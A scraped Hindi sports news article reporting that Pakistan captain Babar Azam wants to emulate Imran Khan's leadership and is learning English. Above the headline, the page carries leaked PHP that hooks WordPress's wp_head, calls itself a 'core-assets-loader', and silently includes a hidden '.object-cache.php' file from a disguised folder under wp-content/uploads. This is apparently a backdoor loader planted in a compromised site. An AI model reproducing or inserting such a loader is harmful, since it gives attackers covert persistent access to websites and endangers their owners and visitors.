add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); PM इमरान खान की तरह बनना चाहते हैं बाबर आजम, सीख रहे हैं अंग्रेजी भाषा – SOCH INDIA
Menu

खेल
PM इमरान खान की तरह बनना चाहते हैं बाबर आजम, सीख रहे हैं अंग्रेजी भाषा

nobanner

पाकिस्‍तान के पूर्व कप्‍तान इमरान खान (Imran Khan) पाकिस्‍तानी क्रिकेट इतिहास के सबसे सफल कप्‍तान माने जाते हैं, उन्‍हीं की कप्‍तानी में पाकिस्‍तान ने एक बार साल 1992 में विश्‍व कप भी अपने नाम किया था, इसके बाद से अब तक पाकिस्‍तान कभी भी वन डे का विश्‍व कप नही जीत सका है. पाकिस्‍तान में जो भी बड़ा खिलाड़ी बनता है या फिर क्रिकेट टीम का कप्‍तान बनता है तो उनके आदर्श इमरान खान ही होते हैं. हालांकि यह बात और है कि बहुत कम क्रिकेटर ऐसे हुए जो इमरान खान की तरह बन पाए. क्रिकेट की कप्‍तानी के बाद इमरान खान ने राजनीति में भी हाथ आजमाया और आज की तारीख में वे पाकिस्‍तान के प्रधानमंत्री हैं. अब पाकिस्‍तान क्रिकेट टीम के नए कप्‍तान बाबर आजम (Babar Azam) भी इमरान खान की तरह बनना चाहते हैं. अगर आपकी सोच बहुत आगे चली गई है और आपको लगता है कि बाबर आजम के भीतर भी प्रधानमंत्री बनने की महत्‍वाकांक्षा है तो आप गलत हैं, दरअसल वे अच्‍छे खिलाड़ी और सफल कप्‍तानों में अपना नाम शुमार कराना चाहते हैं.

पाकिस्तान के लिमिटेड ओवरों के कप्तान बाबर आजम महान क्रिकेटर इमरान खान की आक्रामक कप्तानी से सीख लेना चाहते हैं. बाबर आजम इमरान खान की तरह ‘संपूर्ण नेतृत्वकर्ता’ बनने के लिए क्रिकेट के अलावा अपनी अंग्रेजी में भी सुधार कर रहे हैं. पहले ही T20 टीम की कमान संभाल रहे बाबर आजम को पिछले हफ्ते एकदिवसीय टीम का भी कप्तान नियुक्त किया गया था. पिछले साल तीनों प्रारूपों में दुनिया के शीर्ष बल्लेबाजों में शामिल रहे बाबर आजम ने 2020-2021 सत्र के लिए एकदिवसीय कप्तान के रूप में विकेटकीपर बल्लेबाज सरफराज अहमद की जगह ली.

 

कप्‍तान बाबर आजम ने कहा, इमरान खान काफी आक्रामक कप्तान थे और मैं उसकी तरह बनना चाहता हूं. पाकिस्तान टीम की कप्तानी करना आसान काम नहीं है लेकिन मैं अपने सीनियर खिलाड़ियों से सीख रहा हूं और अंडर-19 टीम के साथ खेलने के समय से ही मुझे कप्तानी का अनुभव है. आजम ने कहा कि संपूर्ण कप्तान बनने के लिए आपको सहजता से मीडिया से बात करने में सक्षम होना चाहिए और लोगों के सामने आपको आसानी से खुद को जाहिर करना चाहिए. पाकिस्तान क्रिकेट टीम के नए कप्तान ने सोमवार को कहा, आजकल बल्लेबाजी पर ध्यान देने के अलावा मैं अंग्रेजी भी सीख रहा हूं. करीब 25 साल के बाबर आजम ने कहा कि वह अंतरराष्ट्रीय क्रिकेट में पाकिस्तान की रैंकिंग से भी संतुष्ट नहीं हैं. उन्होंने कहा, हम जहां हैं मैं उससे खुश नहीं हूं और इस टीम को रैंकिंग में ऊपर देखना चाहता हूं.

 

बाबर आजम ने उम्मीद जताई कि इस साल आस्ट्रेलिया में T20 विश्व कप का आयोजन होगा क्योंकि वह अंतरराष्ट्रीय क्रिकेट परिषद की प्रतियोगिता में अपनी टीम की अगुआई करना चाहते हैं. कोविड-19 महामारी के बीच जुलाई में तीन टेस्ट और तीन T20 अंतरराष्ट्रीय मैचों की सीरीज के लिए इंग्लैंड जाने के बारे में पूछे जाने पर बाबर ने कहा कि खिलाड़ियों को सहज और सुरक्षित महसूस कराने के लिए काफी कड़ी मेहनत और योजना की जरूरत पड़ेगी. उन्होंने कहा, इंग्लैंड का दौरा करना आसान नहीं होगा. खिलाड़ियों की सुरक्षा सबसे महत्वपूर्ण है और समूचित इंतजाम होने पर ही दौरा संभव होगा.